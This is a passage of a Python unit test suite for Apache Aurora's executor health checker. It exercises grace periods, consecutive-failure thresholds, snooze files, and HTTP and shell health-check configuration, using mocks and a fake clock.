self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
assert hct.threaded_health_checker.running is False
self._clock.tick(self.interval_secs)
assert self._clock.converge(threads=[hct.threaded_health_checker])
self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
assert hct.threaded_health_checker.running is False
hct.stop()
assert self._checker.health.call_count == 3
def test_success_outside_grace_period(self):
  '''
  Health checks fail inside grace period, but pass outside and leads to success
  '''
  self.append_health_checks(False, num_calls=2)
  self.append_health_checks(True)
  hct = HealthChecker(
      self._checker.health,
      interval_secs=self.interval_secs,
      clock=self._clock)
  hct.start()

  # Two failing checks inside the grace period leave the task in STARTING.
  for _ in range(2):
    assert self._clock.converge(threads=[hct.threaded_health_checker])
    self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
    assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
    assert hct.threaded_health_checker.running is False
    self._clock.tick(self.interval_secs)

  # The passing check outside the grace period moves the task to RUNNING.
  assert self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
  assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
  assert hct.threaded_health_checker.running is True

  hct.stop()
  assert self._checker.health.call_count == 3
def test_include_max_failure_to_forgiving_attempts(self):
  '''
  Failure streaks up to `max_consecutive_failures` are forgiven when a success
  follows; one additional failure beyond the max fails the task.
  '''
  max_consecutive_failures = 4
  # health checks fail within grace period
  self.append_health_checks(False, num_calls=2)
  # health checks fail max_consecutive_failures times and then succeed once,
  # which resets the failure streak
  self.append_health_checks(False, num_calls=max_consecutive_failures)
  self.append_health_checks(True)
  # health checks fail max_consecutive_failures times and then fail one more
  # time, breaching the max
  self.append_health_checks(False, num_calls=max_consecutive_failures)
  self.append_health_checks(False)
  hct = HealthChecker(
      self._checker.health,
      interval_secs=self.interval_secs,
      max_consecutive_failures=max_consecutive_failures,
      clock=self._clock)
  hct.start()
  # failures ignored inside grace period
  for _ in range(2):
    assert self._clock.converge(threads=[hct.threaded_health_checker])
    self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
    assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
    assert hct.threaded_health_checker.running is False
    self._clock.tick(self.interval_secs)
  # failures never breach max (exactly max_consecutive_failures of them occur)
  for _ in range(max_consecutive_failures):
    assert self._clock.converge(threads=[hct.threaded_health_checker])
    self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
    assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
    assert hct.threaded_health_checker.running is False
    self._clock.tick(self.interval_secs)
  # the single success transitions the task to RUNNING
  assert self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
  assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
  assert hct.threaded_health_checker.running is True
  self._clock.tick(self.interval_secs)
  # failures breach max, causes task failure
  for _ in range(max_consecutive_failures):
    assert self._clock.converge(threads=[hct.threaded_health_checker])
    self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
    assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
    assert hct.threaded_health_checker.running is True
    self._clock.tick(self.interval_secs)
  # the (max + 1)-th consecutive failure finally fails the task
  assert self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, self.interval_secs)
  assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
  assert hct.threaded_health_checker.running is True
  hct.stop()
  # 2 + 4 + 1 + 4 + 1 queued checks were all consumed.
  assert self._checker.health.call_count == 12
def test_initial_interval_whatev(self):
  """With a zero grace period, the very first failing check fails the task."""
  self.append_health_checks(False, 2)
  hct = HealthChecker(
      self._checker.health,
      interval_secs=self.interval_secs,
      grace_period_secs=0,
      clock=self._clock)
  hct.start()
  checker_thread = hct.threaded_health_checker
  self._clock.converge(threads=[checker_thread])
  self._clock.assert_waiting(checker_thread, self.interval_secs)
  # No grace period: a single failure is enough to reach TASK_FAILED.
  assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
  hct.stop()
  # Only one of the two queued checks was ever consumed.
  assert self._checker.health.call_count == 1
def test_consecutive_failures_max_failures(self):
  '''Verify that a task is unhealthy after max_consecutive_failures is exceeded'''
  grace_period_secs = self.initial_interval_secs
  interval_secs = self.interval_secs
  # Two passing checks (meets min_consecutive_successes=2), then three
  # failures (exceeds max_consecutive_failures=2).
  self.append_health_checks(True, num_calls=2)
  self.append_health_checks(False, num_calls=3)
  hct = HealthChecker(
      self._checker.health,
      interval_secs=interval_secs,
      grace_period_secs=grace_period_secs,
      max_consecutive_failures=2,
      min_consecutive_successes=2,
      clock=self._clock)
  hct.start()
  # First success: still STARTING, min_consecutive_successes not yet met.
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
  assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
  assert hct.metrics.sample()['consecutive_failures'] == 0
  self._clock.tick(interval_secs)
  # Second success: the task transitions to RUNNING.
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
  assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
  assert hct.metrics.sample()['consecutive_failures'] == 0
  assert hct.threaded_health_checker.running is True
  self._clock.tick(interval_secs)
  # First failure: still RUNNING, max not exceeded.
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
  assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
  assert hct.metrics.sample()['consecutive_failures'] == 1
  self._clock.tick(interval_secs)
  # Second failure: equals the max, still RUNNING.
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
  assert hct.status == StatusResult('Task is healthy.', TaskState.Value('TASK_RUNNING'))
  assert hct.metrics.sample()['consecutive_failures'] == 2
  self._clock.tick(interval_secs)
  # Third failure exceeds max_consecutive_failures=2: the task fails.
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
  assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
  assert hct.metrics.sample()['consecutive_failures'] == 3
  hct.stop()
  assert self._checker.health.call_count == 5
def test_consecutive_failures_failfast(self):
  '''Verify that health check is failed fast'''
  grace_period_secs = self.initial_interval_secs
  interval_secs = self.interval_secs
  self.append_health_checks(False, num_calls=5)
  # min_consecutive_successes=4 means the task would need a long success run
  # to start, but consecutive failures beyond max_consecutive_failures=2
  # fail the task fast instead.
  hct = HealthChecker(
      self._checker.health,
      interval_secs=interval_secs,
      grace_period_secs=grace_period_secs,
      max_consecutive_failures=2,
      min_consecutive_successes=4,
      clock=self._clock)
  hct.start()
  # failure is ignored inside grace_period_secs
  for _ in range(2):
    self._clock.converge(threads=[hct.threaded_health_checker])
    self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
    assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
    assert hct.metrics.sample()['consecutive_failures'] == 0
    self._clock.tick(interval_secs)
  # 3 consecutive health check failures causes fail-fast
  for attempt in range(2):
    self._clock.converge(threads=[hct.threaded_health_checker])
    self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
    assert hct.status == StatusResult(None, TaskState.Value('TASK_STARTING'))
    # failure is not ignored outside grace_period_secs
    assert hct.metrics.sample()['consecutive_failures'] == (attempt + 1)
    self._clock.tick(interval_secs)
  # The third counted failure exceeds the max and fails the task.
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, interval_secs)
  assert hct.status == StatusResult('Failed health check! reason', TaskState.Value('TASK_FAILED'))
  assert hct.metrics.sample()['consecutive_failures'] == 3
  hct.stop()
  assert self._checker.health.call_count == 5
@pytest.mark.skipif('True', reason='Flaky test (AURORA-1182)')
def test_health_checker_metrics(self):
  """Latency metrics accumulate the (fake) clock time spent inside the check."""
  def slow_check():
    # Each check consumes 0.5s of simulated clock time.
    self._clock.sleep(0.5)
    return (True, None)
  hct = HealthChecker(slow_check, interval_secs=1, grace_period_secs=1, clock=self._clock)
  hct.start()
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, amount=1)
  # No check has run yet, so no latency has been recorded.
  assert hct._total_latency == 0
  assert hct.metrics.sample()['total_latency_secs'] == 0
  # start the health check (during health check it is still 0)
  epsilon = 0.001
  self._clock.tick(1.0 + epsilon)
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, amount=0.5)
  assert hct._total_latency == 0
  assert hct.metrics.sample()['total_latency_secs'] == 0
  assert hct.metrics.sample()['checks'] == 0
  # finish the health check
  self._clock.tick(0.5 + epsilon)
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, amount=1)  # interval_secs
  assert hct._total_latency == 0.5
  assert hct.metrics.sample()['total_latency_secs'] == 0.5
  assert hct.metrics.sample()['checks'] == 1
  # tick again; a second 0.5s check brings the total to 1.0
  self._clock.tick(1.0 + epsilon)
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.tick(0.5 + epsilon)
  self._clock.converge(threads=[hct.threaded_health_checker])
  self._clock.assert_waiting(hct.threaded_health_checker, amount=1)  # interval_secs
  assert hct._total_latency == 1.0
  assert hct.metrics.sample()['total_latency_secs'] == 1.0
  assert hct.metrics.sample()['checks'] == 2
class TestHealthCheckerProvider(unittest.TestCase):
  """Tests that HealthCheckerProvider.from_assigned_task plumbs the task's
  health check configuration through to the constructed health checker."""

  def test_from_assigned_task_http(self):
    """Default (HTTP) health checker picks up timing/threshold config values."""
    interval_secs = 17
    initial_interval_secs = 3
    max_consecutive_failures = 2
    min_consecutive_successes = 2
    task_config = TaskConfig(
        executorConfig=ExecutorConfig(
            name='thermos',
            data=MESOS_JOB(
                task=HELLO_WORLD,
                health_check_config=HealthCheckConfig(
                    interval_secs=interval_secs,
                    initial_interval_secs=initial_interval_secs,
                    max_consecutive_failures=max_consecutive_failures,
                    min_consecutive_successes=min_consecutive_successes,
                    timeout_secs=7
                )
            ).json_dumps()
        )
    )
    assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'health': 9001})
    health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, None)
    hc = health_checker.threaded_health_checker
    assert hc.interval == interval_secs
    assert hc.grace_period_secs == initial_interval_secs
    assert hc.max_consecutive_failures == max_consecutive_failures
    assert hc.min_consecutive_successes == min_consecutive_successes

  def test_from_assigned_task_http_endpoint_style_config(self):
    """An explicit HttpHealthChecker config survives the JSON round trip."""
    interval_secs = 17
    initial_interval_secs = 3
    max_consecutive_failures = 2
    min_consecutive_successes = 2
    http_config = HttpHealthChecker(
        endpoint='/foo',
        expected_response='bar',
        expected_response_code=201
    )
    task_config = TaskConfig(
        executorConfig=ExecutorConfig(
            name='thermos',
            data=MESOS_JOB(
                task=HELLO_WORLD,
                health_check_config=HealthCheckConfig(
                    health_checker=HealthCheckerConfig(http=http_config),
                    interval_secs=interval_secs,
                    initial_interval_secs=initial_interval_secs,
                    max_consecutive_failures=max_consecutive_failures,
                    min_consecutive_successes=min_consecutive_successes,
                    timeout_secs=7
                )
            ).json_dumps()
        )
    )
    assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'health': 9001})
    # Sanity-check the serialized executor config before handing it to the provider.
    execconfig_data = json.loads(assigned_task.task.executorConfig.data)
    http_exec_config = execconfig_data['health_check_config']['health_checker']['http']
    assert http_exec_config['endpoint'] == '/foo'
    assert http_exec_config['expected_response'] == 'bar'
    assert http_exec_config['expected_response_code'] == 201
    health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, None)
    hc = health_checker.threaded_health_checker
    assert hc.interval == interval_secs
    assert hc.grace_period_secs == initial_interval_secs
    assert hc.max_consecutive_failures == max_consecutive_failures
    assert hc.min_consecutive_successes == min_consecutive_successes

  @mock.patch('pwd.getpwnam')
  def test_from_assigned_task_shell(self, mock_getpwnam):
    """A shell health checker looks up the job role's user (for demotion)."""
    interval_secs = 17
    initial_interval_secs = 3
    max_consecutive_failures = 2
    min_consecutive_successes = 2
    timeout_secs = 5
    shell_config = ShellHealthChecker(shell_command='failed command')
    task_config = TaskConfig(
        job=JobKey(role='role', environment='env', name='name'),
        executorConfig=ExecutorConfig(
            name='thermos-generic',
            data=MESOS_JOB(
                task=HELLO_WORLD,
                health_check_config=HealthCheckConfig(
                    health_checker=HealthCheckerConfig(shell=shell_config),
                    interval_secs=interval_secs,
                    initial_interval_secs=initial_interval_secs,
                    max_consecutive_failures=max_consecutive_failures,
                    min_consecutive_successes=min_consecutive_successes,
                    timeout_secs=timeout_secs
                )
            ).json_dumps()
        )
    )
    # Note: no 'health' port here — the shell command does not need one.
    assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
    execconfig_data = json.loads(assigned_task.task.executorConfig.data)
    assert execconfig_data[
        'health_check_config']['health_checker']['shell']['shell_command'] == 'failed command'
    mock_sandbox = mock.Mock(spec_set=SandboxInterface)
    type(mock_sandbox).root = mock.PropertyMock(return_value='/some/path')
    type(mock_sandbox).is_filesystem_image = mock.PropertyMock(return_value=False)
    health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, mock_sandbox)
    hc = health_checker.threaded_health_checker
    assert hc.interval == interval_secs
    assert hc.grace_period_secs == initial_interval_secs
    assert hc.max_consecutive_failures == max_consecutive_failures
    assert hc.min_consecutive_successes == min_consecutive_successes
    # The provider consulted the role's user info exactly once.
    mock_getpwnam.assert_called_once_with(task_config.job.role)

  @mock.patch('pwd.getpwnam')
  def test_from_assigned_task_shell_no_demotion(self, mock_getpwnam):
    """With nosetuid_health_checks=True the provider skips the user lookup."""
    interval_secs = 17
    initial_interval_secs = 3
    max_consecutive_failures = 2
    min_consecutive_successes = 2
    timeout_secs = 5
    shell_config = ShellHealthChecker(shell_command='failed command')
    task_config = TaskConfig(
        job=JobKey(role='role', environment='env', name='name'),
        executorConfig=ExecutorConfig(
            name='thermos-generic',
            data=MESOS_JOB(
                task=HELLO_WORLD,
                health_check_config=HealthCheckConfig(
                    health_checker=HealthCheckerConfig(shell=shell_config),
                    interval_secs=interval_secs,
                    initial_interval_secs=initial_interval_secs,
                    max_consecutive_failures=max_consecutive_failures,
                    min_consecutive_successes=min_consecutive_successes,
                    timeout_secs=timeout_secs
                )
            ).json_dumps()
        )
    )
    assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
    execconfig_data = json.loads(assigned_task.task.executorConfig.data)
    assert execconfig_data[
        'health_check_config']['health_checker']['shell']['shell_command'] == 'failed command'
    mock_sandbox = mock.Mock(spec_set=SandboxInterface)
    type(mock_sandbox).root = mock.PropertyMock(return_value='/some/path')
    type(mock_sandbox).is_filesystem_image = mock.PropertyMock(return_value=False)
    health_checker = HealthCheckerProvider(nosetuid_health_checks=True).from_assigned_task(
        assigned_task,
        mock_sandbox)
    hc = health_checker.threaded_health_checker
    assert hc.interval == interval_secs
    assert hc.grace_period_secs == initial_interval_secs
    assert hc.max_consecutive_failures == max_consecutive_failures
    assert hc.min_consecutive_successes == min_consecutive_successes
    # Should not be trying to access role's user info.
    assert not mock_getpwnam.called

  @mock.patch.dict(os.environ, {'MESOS_DIRECTORY': '/some/path'})
  @mock.patch('pwd.getpwnam')
  def test_from_assigned_task_shell_filesystem_image(self, mock_getpwnam):
    """For a filesystem-image sandbox the raw command is passed alongside a
    wrapped command (built with mesos_containerizer_path) to ShellHealthCheck."""
    interval_secs = 17
    initial_interval_secs = 3
    max_consecutive_failures = 2
    min_consecutive_successes = 2
    timeout_secs = 5
    shell_config = ShellHealthChecker(shell_command='failed command')
    task_config = TaskConfig(
        job=JobKey(role='role', environment='env', name='name'),
        executorConfig=ExecutorConfig(
            name='thermos-generic',
            data=MESOS_JOB(
                task=HELLO_WORLD,
                health_check_config=HealthCheckConfig(
                    health_checker=HealthCheckerConfig(shell=shell_config),
                    interval_secs=interval_secs,
                    initial_interval_secs=initial_interval_secs,
                    max_consecutive_failures=max_consecutive_failures,
                    min_consecutive_successes=min_consecutive_successes,
                    timeout_secs=timeout_secs
                )
            ).json_dumps()
        )
    )
    assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
    execconfig_data = json.loads(assigned_task.task.executorConfig.data)
    assert execconfig_data[
        'health_check_config']['health_checker']['shell']['shell_command'] == 'failed command'
    mock_sandbox = mock.Mock(spec_set=SandboxInterface)
    type(mock_sandbox).root = mock.PropertyMock(return_value='/some/path')
    type(mock_sandbox).is_filesystem_image = mock.PropertyMock(return_value=True)
    with mock.patch('apache.aurora.executor.common.health_checker.ShellHealthCheck') as mock_shell:
      HealthCheckerProvider(
          nosetuid_health_checks=False,
          mesos_containerizer_path='/some/path/mesos-containerizer').from_assigned_task(
              assigned_task,
              mock_sandbox)

      # Equality helper: matches any value that is not None.
      class NotNone(object):
        def __eq__(self, other):
          return other is not None

      assert mock_shell.mock_calls == [
          mock.call(
              raw_cmd='failed command',
              wrapped_cmd=NotNone(),
              preexec_fn=None,
              timeout_secs=5.0
          )
      ]

  def test_interpolate_cmd(self):
    """Making sure thermos.ports[foo] gets correctly substituted with assignedPorts info."""
    interval_secs = 17
    initial_interval_secs = 3
    max_consecutive_failures = 2
    min_consecutive_successes = 2
    timeout_secs = 5
    shell_cmd = 'FOO_PORT={{thermos.ports[foo]}} failed command'
    shell_config = ShellHealthChecker(shell_command=shell_cmd)
    task_config = TaskConfig(
        executorConfig=ExecutorConfig(
            name='thermos-generic',
            data=MESOS_JOB(
                task=HELLO_WORLD,
                health_check_config=HealthCheckConfig(
                    health_checker=HealthCheckerConfig(shell=shell_config),
                    interval_secs=interval_secs,
                    initial_interval_secs=initial_interval_secs,
                    max_consecutive_failures=max_consecutive_failures,
                    min_consecutive_successes=min_consecutive_successes,
                    timeout_secs=timeout_secs
                )
            ).json_dumps()
        )
    )
    assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'foo': 9001})
    interpolated_cmd = HealthCheckerProvider.interpolate_cmd(
        assigned_task,
        cmd=shell_cmd
    )
    assert interpolated_cmd == 'FOO_PORT=9001 failed command'

  def test_from_assigned_task_no_health_port(self):
    """Without a 'health' port and with no shell command, a NoopHealthChecker is returned."""
    interval_secs = 17
    initial_interval_secs = 3
    max_consecutive_failures = 2
    min_consecutive_successes = 2
    timeout_secs = 5
    task_config = TaskConfig(
        executorConfig=ExecutorConfig(
            name='thermos-generic',
            data=MESOS_JOB(
                task=HELLO_WORLD,
                health_check_config=HealthCheckConfig(
                    interval_secs=interval_secs,
                    initial_interval_secs=initial_interval_secs,
                    max_consecutive_failures=max_consecutive_failures,
                    min_consecutive_successes=min_consecutive_successes,
                    timeout_secs=timeout_secs
                )
            ).json_dumps()
        )
    )
    # No health port and we don't have a shell_command.
    assigned_task = AssignedTask(task=task_config, instanceId=1, assignedPorts={'http': 9001})
    health_checker = HealthCheckerProvider().from_assigned_task(assigned_task, None)
    assert isinstance(health_checker, NoopHealthChecker)
class TestThreadedHealthChecker(unittest.TestCase):
  """Unit tests driving ThreadedHealthChecker internals directly with mocks
  (no real threads or clocks)."""

  def setUp(self):
    # Health check callable that reports healthy by default.
    self.health = mock.Mock()
    self.health.return_value = (True, 'Fake')
    self.sandbox = mock.Mock(spec_set=SandboxInterface)
    self.sandbox.exists.return_value = True
    self.sandbox.root = '/root'
    self.initial_interval_secs = 15
    self.interval_secs = 10
    self.max_consecutive_failures = 1
    self.min_consecutive_successes = 2
    self.clock = mock.Mock(spec=time)
    self.clock.time.return_value = 0
    # Checker constructed without a sandbox...
    self.health_checker = HealthChecker(
        self.health,
        None,
        self.interval_secs,
        self.initial_interval_secs,
        self.max_consecutive_failures,
        self.min_consecutive_successes,
        self.clock)
    # ...and one backed by a mock sandbox.
    self.health_checker_sandbox_exists = HealthChecker(
        self.health,
        self.sandbox,
        self.interval_secs,
        self.initial_interval_secs,
        self.max_consecutive_failures,
        self.min_consecutive_successes,
        self.clock)

  def test_perform_check_if_not_disabled_snooze_file_is_none(self):
    """With no snooze file configured the underlying check always runs."""
    self.health_checker_sandbox_exists.threaded_health_checker.snooze_file = None
    assert self.health.call_count == 0
    assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
    # NOTE(review): snooze_file is cleared on health_checker_sandbox_exists
    # above, but the check below is invoked on health_checker — confirm the
    # intent was to call health_checker_sandbox_exists here.
    self.health_checker.threaded_health_checker._perform_check_if_not_disabled()
    assert self.health.call_count == 1
    assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0

  @mock.patch('os.path', spec_set=os.path)
  def test_perform_check_if_not_disabled_no_snooze_file(self, mock_os_path):
    """If the snooze file does not exist on disk the check still runs."""
    mock_os_path.isfile.return_value = False
    assert self.health.call_count == 0
    assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
    self.health_checker_sandbox_exists.threaded_health_checker._perform_check_if_not_disabled()
    assert self.health.call_count == 1
    assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0

  @mock.patch('os.path', spec_set=os.path)
  def test_perform_check_if_not_disabled_snooze_file_exists(self, mock_os_path):
    """If the snooze file exists the check is skipped and reported healthy."""
    mock_os_path.isfile.return_value = True
    assert self.health.call_count == 0
    assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 0
    result = (
        self.health_checker_sandbox_exists.threaded_health_checker._perform_check_if_not_disabled())
    # Underlying check never ran; a healthy result was synthesized instead.
    assert self.health.call_count == 0
    assert self.health_checker_sandbox_exists.metrics.sample()['snoozed'] == 1
    assert result == (True, None)

  def test_maybe_update_health_check_count_reset_count(self):
    """Outside the forgiving attempts, a success/failure resets the opposite streak."""
    hc = self.health_checker.threaded_health_checker
    # Skip past the forgiving (grace period) attempts so results are counted.
    hc.attempts = hc.forgiving_attempts
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(True, 'reason-1')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 1
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-2')
    # The failure resets the success streak.
    assert hc.current_consecutive_failures == 1
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(True, 'reason-3')
    # The success resets the failure streak.
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 1

  def test_maybe_update_health_check_count_ignore_failures_within_grace_period(self):
    """Failures during the forgiving attempts are not counted; later ones are."""
    hc = self.health_checker.threaded_health_checker
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-1')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-2')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-3')
    # The third failure is no longer forgiven and starts the streak.
    assert hc.current_consecutive_failures == 1
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-4')
    assert hc.current_consecutive_failures == 2
    assert hc.current_consecutive_successes == 0

  def test_maybe_update_health_check_count_dont_ignore_failures_after_grace_period(self):
    """Every failure past the forgiving attempts increments the failure streak."""
    hc = self.health_checker.threaded_health_checker
    hc.attempts = hc.forgiving_attempts
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-1')
    assert hc.current_consecutive_failures == 1
    assert hc.current_consecutive_successes == 0
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-2')
    assert hc.current_consecutive_failures == 2
    assert hc.current_consecutive_successes == 0

  def test_maybe_update_health_check_count_fail_fast(self):
    """Counted failures beyond max_consecutive_failures (1) while the task
    never started running fail the checker fast."""
    hc = self.health_checker.threaded_health_checker
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    assert hc.healthy is True
    assert hc.running is False
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-1')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    assert hc.running is False
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-2')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    assert hc.running is False
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-3')
    assert hc.current_consecutive_failures == 1
    assert hc.current_consecutive_successes == 0
    assert hc.running is False
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-4')
    # Second counted failure exceeds max_consecutive_failures=1: fail fast.
    assert hc.current_consecutive_failures == 2
    assert hc.current_consecutive_successes == 0
    assert hc.running is False
    assert hc.healthy is False
    assert hc.reason == 'reason-4'

  def test_maybe_update_health_check_count_max_failures_1(self):
    """With an existing success, failures beyond the max mark the checker unhealthy."""
    hc = self.health_checker.threaded_health_checker
    hc.current_consecutive_successes = 1
    hc.attempts = hc.forgiving_attempts
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 1
    assert hc.healthy is True
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-1')
    assert hc.current_consecutive_failures == 1
    assert hc.current_consecutive_successes == 0
    assert hc.healthy is True
    hc.attempts += 1
    hc._maybe_update_health_check_count(False, 'reason-2')
    # Second failure exceeds max_consecutive_failures=1.
    assert hc.current_consecutive_failures == 2
    assert hc.current_consecutive_successes == 0
    assert hc.healthy is False
    assert hc.reason == 'reason-2'

  def test_maybe_update_health_check_count_success(self):
    """min_consecutive_successes (2) must be met before running flips to True."""
    hc = self.health_checker.threaded_health_checker
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 0
    assert hc.running is False
    assert hc.healthy is True
    hc.attempts += 1
    hc._maybe_update_health_check_count(True, 'reason')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 1
    assert hc.running is False
    assert hc.healthy is True
    hc.attempts += 1
    hc._maybe_update_health_check_count(True, 'reason')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 2
    assert hc.running is True
    assert hc.healthy is True
    hc.attempts += 1
    hc._maybe_update_health_check_count(True, 'reason')
    assert hc.current_consecutive_failures == 0
    assert hc.current_consecutive_successes == 3
    assert hc.running is True
    assert hc.healthy is True

  def test_run_success(self):
    """run() loops until dead.is_set(); all-successful checks leave it healthy."""
    self.health.return_value = (True, 'success')
    mock_is_set = mock.Mock(spec=threading._Event.is_set)
    # Three loop iterations; the fourth is_set() call terminates run().
    liveness = [False, False, False, True]
    mock_is_set.side_effect = lambda: liveness.pop(0)
    self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
    self.health_checker.threaded_health_checker.run()
    assert self.clock.sleep.call_count == 3
    assert self.health_checker.threaded_health_checker.current_consecutive_failures == 0
    assert self.health_checker.threaded_health_checker.current_consecutive_successes == 3
    assert self.health_checker.threaded_health_checker.running is True
    assert self.health_checker.threaded_health_checker.healthy is True
    assert self.health_checker.threaded_health_checker.reason is None

  def test_run_failure(self):
    """All-failing checks leave the checker unhealthy with the last reason."""
    self.health.return_value = (False, 'failure')
    mock_is_set = mock.Mock(spec=threading._Event.is_set)
    liveness = [False, False, False, False, True]
    mock_is_set.side_effect = lambda: liveness.pop(0)
    self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
    self.health_checker.threaded_health_checker.run()
    assert self.clock.sleep.call_count == 4
    assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
    assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
    assert self.health_checker.threaded_health_checker.running is False
    assert self.health_checker.threaded_health_checker.healthy is False
    assert self.health_checker.threaded_health_checker.reason == 'failure'

  def test_run_failure_unhealthy_when_failfast(self):
    """A lone success never reaches min_consecutive_successes=2, so the task
    never starts running and the later failures fail it fast."""
    health_status = [(False, 'failure-1'), (True, None), (False, 'failure-3'), (False, 'failure-4')]
    self.health.side_effect = lambda: health_status.pop(0)
    mock_is_set = mock.Mock(spec=threading._Event.is_set)
    liveness = [False, False, False, False, True]
    mock_is_set.side_effect = lambda: liveness.pop(0)
    self.health_checker.threaded_health_checker.dead.is_set = mock_is_set
    self.health_checker.threaded_health_checker.run()
    assert self.clock.sleep.call_count == 4
    assert self.health_checker.threaded_health_checker.current_consecutive_failures == 2
    assert self.health_checker.threaded_health_checker.current_consecutive_successes == 0
    assert self.health_checker.threaded_health_checker.running is False
    assert self.health_checker.threaded_health_checker.healthy is False
    assert self.health_checker.threaded_health_checker.reason == 'failure-4'

  def test_run_unhealthy_after_callback(self):
    """Once running (after 2 successes), enough failures mark it unhealthy
    while `running` stays True."""
    health_status = [(True, None), (True, None), (False, 'failure-4'), (False, 'failure-5')]
